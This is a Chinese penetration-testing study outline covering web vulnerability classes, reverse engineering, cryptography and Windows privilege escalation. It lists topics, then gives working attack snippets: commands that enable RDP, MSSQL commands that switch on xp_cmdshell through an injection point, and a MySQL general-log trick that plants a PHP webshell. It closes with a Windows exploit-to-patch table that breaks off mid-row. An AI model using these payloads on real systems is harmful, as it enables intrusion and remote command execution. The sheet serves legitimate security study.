渗透测试知识点总结：从基础到进阶

渗透测试知识点总结

核心知识

1. Web 安全
2. 二进制安全（包括逆向工程和漏洞利用）
3. 密码学知识

其他基础

1. 软件开发
2. 数据库原理
3. 编程语言
4. 计算机取证分析和隐写术
5. 网络协议及网络算法
6. 算法与数据结构
7. 研究开源工具的基本原理，懂得自制工具

Web 安全

1. 注入类

• SQL 注入
• XSS 跨站脚本攻击
• XXE
• 命令执行/命令注入（bash）
• 文件上传/文件下载

2. 信息漏洞

• 源码泄露
• 敏感信息接口
• 员工资料泄露
• 服务器信息泄露

3. 逻辑类

• 权限绕过
• 条件竞争
• 数据篡改

网站工作原理

• HTTP 协议
• Webserver

HTTP 协议构成

1. http-header 构成（request/response）
2. http-body 构成（request/response）
3. http 方法

Webserver

1. Webserver 分类
2. Webserver 解析流程
3. Webserver 基础安全

编程语言

• 前端：html, css, javascript
• 后台和脚本语言：php, java, python

数据库原理

• 关系型数据库（MySQL）
• 非关系型数据库

逆向工程

1. 体系结构：机器指令和汇编语言
2. 编译原理：自动机，词法分析，语法分析
3. 操作系统：系统的加载与引导
4. 计算机组成原理

漏洞挖掘与利用

1. 逆向工程
2. 模糊测试
3. 什么是漏洞
4. 程序员在什么时候会犯错
5. 信息收集工具：端口，子域名，代码泄露，员工字典
6. 数据包抓取修改重放工具
7. 顺手的浏览器及插件（火狐 Hackbar）
8. VPS，漏洞验证
9. 分析业务功能
10. 分析 web 架构
11. 针对性的罗列可能的漏洞类型
12. 详细测试：不放过任何一个数据包
13. 单一利用：Getshell；敏感信息接口
14. 组合利用：XSS+CSRF

密码学

1. 古典密码学：凯撒密码；移位密码
2. 现代密码学：对称加密体系（DES；AES）和非对称加密体系（RSA）

Windows 提权示例

Win2003 RDP 开启

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Win2003/WinXP 注册表开启

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

MSSQL 开启 xp_cmdshell

关闭命令

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

开启命令

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

注：在注入点运行上述语句时，如果出现回显提示配置选项不存在，可尝试以下语句：

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'user connections', 1;
RECONFIGURE;

MySQL 日志拿 Shell

set global general_log = on;
set global general_log_file = 'C:/phpStudy/WWW/sinight.php';
select '<?php @assert($_POST["sinight"]); ?>';
set global general_log = off;

Windows 提权对照表

CVE	KB	Description	Operating System
CVE-2017-0213	KB4013389	Windows COM Elevation of Privilege Vulnerability	windows 10/8.1/7/2016/2010/2008
MS17-010	KB4013389	Windows Kernel Mode Drivers	windows 7/2008/2003/XP
MS16-135	KB3199135	Windows Kernel Mode Drivers	2016
MS16-098	KB3178466	Kernel Driver	Win 8.1
MS16-075	KB3164038	Hot Potato	2003/2008/7/8/2012
MS16-032	KB3143141	Secondary Logon Handle	2008/7/8/10/2012
MS16-016	KB3136041	WebDAV	2008/Vista/7
MS15-097	KB3089656	remote code execution	win8.1/2012
MS15-076	KB3067505	RPC	2003/2008/7/8/2012
MS15-077	KB3077657	ATM	XP/Vista/Win7/Win8/2000/2003/2008/2012
MS15-061	KB3057839	Kernel Driver	2003/2008/7/8/2012
MS15-051	KB3057191	Windows Kernel Mode Drivers	2003/2008/7/8/2012
MS15-010	KB3036220	Kernel Driver	2003/2008/7/8
MS15-015

Python 开启 HTTP 服务

• Python <= 2.3: python -c "import SimpleHTTPServer as s; s.test();" 8000
• Python >= 2.4: python -m SimpleHTTPServer 8000
• Python 3.x: python -m http.server 8000